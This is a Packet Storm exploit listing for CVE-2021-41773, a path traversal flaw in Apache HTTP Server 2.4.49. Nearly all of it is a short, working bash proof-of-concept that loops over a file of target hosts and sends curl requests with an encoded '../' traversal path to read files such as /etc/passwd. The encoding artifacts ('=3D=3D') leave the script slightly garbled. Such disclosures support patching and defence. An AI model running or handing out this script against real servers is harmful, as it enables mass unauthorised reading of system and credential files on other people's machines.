Lucene search

K
packetstormLucas SouzaPACKETSTORM:164418
HistoryOct 06, 2021 - 12:00 a.m.

Apache HTTP Server 2.4.49 Path Traversal

2021-10-0600:00:00
Lucas Souza
packetstormsecurity.com
437

EPSS

0.975

Percentile

100.0%

`# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal  
# Date: 10/05/2021  
# Exploit Author: Lucas Souza https://lsass.io  
# Vendor Homepage: https://apache.org/  
# Version: 2.4.49  
# Tested on: 2.4.49  
# CVE : CVE-2021-41773  
# Credits: Ash Daulton and the cPanel Security Team  
  
#!/bin/bash  
  
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then  
echo Set [TAGET-LIST.TXT] [PATH]  
echo ./PoC.sh targets.txt /etc/passwd  
exit  
fi  
for host in $(cat $1); do  
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done  
`